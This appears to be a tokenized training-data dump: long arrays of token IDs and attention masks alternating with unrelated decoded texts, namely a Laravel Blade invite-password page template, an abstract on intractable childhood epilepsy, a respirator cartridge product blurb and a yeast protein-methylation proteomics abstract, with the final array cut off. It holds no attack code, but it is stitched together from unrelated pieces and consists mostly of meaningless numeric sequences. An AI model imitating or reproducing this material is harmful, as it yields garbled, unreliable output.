1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
@extends('simple-layout') @section('content') <div class="container very-small mt-xl"> <div class="card content-wrap auto-height"> <h1 class="list-heading">{{ trans('auth.user_invite_page_welcome', ['appName' => setting('app-name')]) }}</h1> <p>{{ trans('auth.user_invite_page_text', ['appName' => setting('app-name')]) }}</p> <form action="{{ url('/register/invite/' . $token) }}" method="POST" class="stretch-inputs"> {!! csrf_field() !!} <div class="form-group"> <label for="password">{{ trans('auth.password') }}</label> @include('form.password', ['name' => 'password', 'placeholder' => trans('auth.password_hint')]) </div> <div class="text-right"> <button class="button">{{ trans('auth.user_invite_page_confirm_button') }}</button> </div> </form> </div> </div> @stop
[ 1, 732, 1062, 1975, 877, 12857, 29899, 2680, 1495, 13, 13, 29992, 2042, 877, 3051, 1495, 13, 13, 1678, 529, 4563, 770, 543, 7611, 1407, 29899, 9278, 286, 29873, 29899, 15524, 1013, 13, 4706, 529, 4563, 770, 543, 7543, 2793, 29899, 6312, 4469, 29899, 3545, 1013, 13, 9651, 529, 29882, 29896, 770, 543, 1761, 29899, 2813, 292, 1013, 6224, 1301, 877, 5150, 29889, 1792, 29918, 11569, 568, 29918, 3488, 29918, 20466, 2763, 742, 6024, 932, 1170, 29915, 1149, 4444, 877, 932, 29899, 978, 1495, 2314, 9156, 829, 29882, 29896, 29958, 13, 9651, 529, 29886, 29958, 6224, 1301, 877, 5150, 29889, 1792, 29918, 11569, 568, 29918, 3488, 29918, 726, 742, 6024, 932, 1170, 29915, 1149, 4444, 877, 932, 29899, 978, 1495, 2314, 9156, 829, 29886, 29958, 13, 13, 9651, 529, 689, 3158, 543, 6224, 3142, 11219, 9573, 29914, 11569, 568, 22208, 869, 395, 6979, 29897, 500, 5038, 1158, 543, 5438, 29908, 770, 543, 303, 10301, 29899, 2080, 29879, 1013, 13, 18884, 426, 6824, 5939, 9600, 29918, 2671, 580, 21443, 29913, 13, 13, 18884, 529, 4563, 770, 543, 689, 29899, 2972, 1013, 13, 462, 1678, 529, 1643, 363, 543, 5630, 1013, 6224, 1301, 877, 5150, 29889, 5630, 1495, 9156, 829, 1643, 29958, 13, 462, 1678, 732, 2856, 877, 689, 29889, 5630, 742, 6024, 978, 29915, 1149, 525, 5630, 742, 525, 27074, 29915, 1149, 1301, 877, 5150, 29889, 5630, 29918, 29882, 524, 1495, 2314, 13, 18884, 1533, 4563, 29958, 13, 13, 18884, 529, 4563, 770, 543, 726, 29899, 1266, 1013, 13, 462, 1678, 529, 3092, 770, 543, 3092, 1013, 6224, 1301, 877, 5150, 29889, 1792, 29918, 11569, 568, 29918, 3488, 29918, 26897, 29918, 3092, 1495, 9156, 829, 3092, 29958, 13, 18884, 1533, 4563, 29958, 13, 13, 9651, 1533, 689, 29958, 13, 13, 4706, 1533, 4563, 29958, 13, 1678, 1533, 4563, 29958, 13, 13, 29992, 9847, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Intractable childhood epilepsy: choosing between the treatments. Intractable epilepsy is a significant problem affecting approximately 1 in 10 children with seizures. This is traditionally defined as a failure to respond to at least 2 anticonvulsant drugs tried at reasonable doses for several weeks. Although involving a minority of those with epilepsy, these children typically have significant morbidity, detrimental effects on quality of life, and often require hours of time from a child neurologist in their care. In this review and special issue, a practical approach to management options for children who have refractory epilepsy will be presented from experts in the field.
[ 1, 3159, 1461, 519, 2278, 6614, 9358, 488, 567, 29891, 29901, 23906, 1546, 278, 7539, 1860, 29889, 13, 2928, 1461, 519, 9358, 488, 567, 29891, 338, 263, 7282, 1108, 6602, 292, 14235, 29871, 29896, 297, 29871, 29896, 29900, 4344, 411, 409, 466, 1973, 29889, 910, 338, 11399, 635, 3342, 408, 263, 10672, 304, 10049, 304, 472, 3203, 29871, 29906, 3677, 4144, 29894, 7273, 424, 5883, 3174, 1898, 472, 15590, 3248, 267, 363, 3196, 11405, 29889, 8512, 21677, 263, 9461, 537, 310, 1906, 411, 9358, 488, 567, 29891, 29892, 1438, 4344, 12234, 505, 7282, 3036, 23883, 537, 29892, 1439, 29878, 2073, 284, 9545, 373, 11029, 310, 2834, 29892, 322, 4049, 1996, 6199, 310, 931, 515, 263, 2278, 452, 2192, 1188, 391, 297, 1009, 2562, 29889, 512, 445, 9076, 322, 4266, 2228, 29892, 263, 15031, 2948, 304, 10643, 3987, 363, 4344, 1058, 505, 2143, 1461, 706, 9358, 488, 567, 29891, 674, 367, 9132, 515, 2902, 1372, 297, 278, 1746, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Cartridges for use with 5500, RU8500 and 7700 Series half masks as well as 5400, RU6500 and 7600 Series full facepieces. Filter Assembly R95 attaches filters to a half mask or full facepiece, and includes 2 each filters, filter holders and filter covers.
[ 1, 12370, 2429, 2710, 363, 671, 411, 29871, 29945, 29945, 29900, 29900, 29892, 390, 29965, 29947, 29945, 29900, 29900, 322, 29871, 29955, 29955, 29900, 29900, 10488, 4203, 11105, 29879, 408, 1532, 408, 29871, 29945, 29946, 29900, 29900, 29892, 390, 29965, 29953, 29945, 29900, 29900, 322, 29871, 29955, 29953, 29900, 29900, 10488, 2989, 3700, 12343, 778, 29889, 19916, 13266, 390, 29929, 29945, 10641, 267, 18094, 304, 263, 4203, 11105, 470, 2989, 3700, 12343, 346, 29892, 322, 7805, 29871, 29906, 1269, 18094, 29892, 4175, 4808, 414, 322, 4175, 18469, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Proteomic analysis of protein methylation in the yeast Saccharomyces cerevisiae. Protein methylation catalyzed by SAM-dependent methyltransferase represents a major PTM involved in many important biological processes. Because methylation can occur on nitrogen, oxygen and sulfur centers and multiple methylation states exist on the nitrogen centers, methylproteome remains poorly documented. Here we present the methylation by isotope labeled SAM (MILS) strategy for a highly-confident analysis of the methylproteome of the yeast Saccharomyces cerevisiae based on the online multidimensional μHPLC/MS/MS technology. We identified 43 methylated proteins, containing 68 methylation events associated with 64 methylation sites. More than 90% of these methylation events were previously unannotated in Uniprot database. Our results indicated, 1) over 2.6% of identified S. cerevisiae proteins are methylated, 2) the amino acid residue preference of protein methylation follows the order Lys≫Arg>Asp>Asn≈Gln≈His>Glu>Cys, and 3) the methylation state on nitrogen center is largely exclusive. As our dataset covers various types of methylation centers, it provides rich information about yeast methylproteome and should significantly contribute to the field of protein methylation. In this paper, we presented the methylation by isotope labeled SAM (MILS) strategy for a highly-confident analysis of the methylproteome of the yeast S. cerevisiae and collected a comprehensive list of proteins methylated on a set of distinct residues (K, R, N, E, D, Q, H, C). Our study provided useful information about the amino acid residue preference and methylation state distributions on nitrogen centers of protein methylation in S. cerevisiae.
[ 1, 14409, 25426, 7418, 310, 26823, 286, 621, 2904, 362, 297, 278, 8007, 579, 15573, 3090, 16103, 778, 274, 406, 1730, 23395, 29889, 13, 1184, 371, 262, 286, 621, 2904, 362, 17246, 12339, 287, 491, 317, 5194, 29899, 18980, 286, 621, 2904, 3286, 571, 559, 11524, 263, 4655, 349, 23081, 9701, 297, 1784, 4100, 4768, 5996, 10174, 29889, 7311, 286, 621, 2904, 362, 508, 6403, 373, 21767, 307, 1885, 29892, 288, 28596, 322, 5394, 22613, 1644, 414, 322, 2999, 286, 621, 2904, 362, 5922, 1863, 373, 278, 21767, 307, 1885, 1644, 414, 29892, 286, 621, 2904, 14676, 608, 9242, 6460, 368, 23531, 29889, 2266, 591, 2198, 278, 286, 621, 2904, 362, 491, 338, 327, 2300, 301, 24025, 317, 5194, 313, 29924, 6227, 29903, 29897, 13705, 363, 263, 10712, 29899, 5527, 1693, 7418, 310, 278, 286, 621, 2904, 14676, 608, 310, 278, 8007, 579, 15573, 3090, 16103, 778, 274, 406, 1730, 23395, 2729, 373, 278, 7395, 1773, 333, 326, 8180, 29871, 30167, 3954, 12182, 29914, 4345, 29914, 4345, 15483, 29889, 1334, 15659, 29871, 29946, 29941, 286, 621, 2904, 630, 3279, 1144, 29892, 6943, 29871, 29953, 29947, 286, 621, 2904, 362, 4959, 6942, 411, 29871, 29953, 29946, 286, 621, 2904, 362, 11840, 29889, 5853, 1135, 29871, 29929, 29900, 29995, 310, 1438, 286, 621, 2904, 362, 4959, 892, 9251, 443, 6735, 630, 297, 853, 666, 5450, 2566, 29889, 8680, 2582, 18694, 29892, 29871, 29896, 29897, 975, 29871, 29906, 29889, 29953, 29995, 310, 15659, 317, 29889, 274, 406, 1730, 23395, 3279, 1144, 526, 286, 621, 2904, 630, 29892, 29871, 29906, 29897, 278, 626, 1789, 22193, 10995, 434, 24583, 310, 26823, 286, 621, 2904, 362, 4477, 278, 1797, 365, 952, 31089, 8559, 29958, 29909, 1028, 29958, 2887, 29876, 30583, 29954, 3083, 30583, 29950, 275, 29958, 29954, 6092, 29958, 29907, 952, 29892, 322, 29871, 29941, 29897, 278, 286, 621, 2904, 362, 2106, 373, 21767, 307, 1885, 4818, 338, 18425, 29192, 29889, 1094, 1749, 8783, 18469, 5164, 4072, 310, 286, 621, 2904, 362, 1644, 414, 29892, 372, 8128, 8261, 2472, 1048, 8007, 579, 286, 621, 2904, 14676, 608, 322, 881, 16951, 29126, 304, 278, 1746, 310, 26823, 286, 621, 2904, 362, 29889, 512, 445, 5650, 29892, 591, 9132, 278, 286, 621, 2904, 362, 491, 338, 327, 2300, 301, 24025, 317, 5194, 313, 29924, 6227, 29903, 29897, 13705, 363, 263, 10712, 29899, 5527, 1693, 7418, 310, 278, 286, 621, 2904, 14676, 608, 310, 278, 8007, 579, 317, 29889, 274, 406, 1730, 23395, 322, 16531, 263, 15171, 6270, 1051, 310, 3279, 1144, 286, 621, 2904, 630, 373, 263, 731, 310, 8359, 10995, 1041, 313, 29968, 29892, 390, 29892, 405, 29892, 382, 29892, 360, 29892, 660, 29892, 379, 29892, 315, 467, 8680, 6559, 4944, 5407, 2472, 1048, 278, 626, 1789, 22193, 10995, 434, 24583, 322, 286, 621, 2904, 362, 2106, 18822, 373, 21767, 307, 1885, 1644, 414, 310, 26823, 286, 621, 2904, 362, 297, 317, 29889, 274, 406, 1730, 23395, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 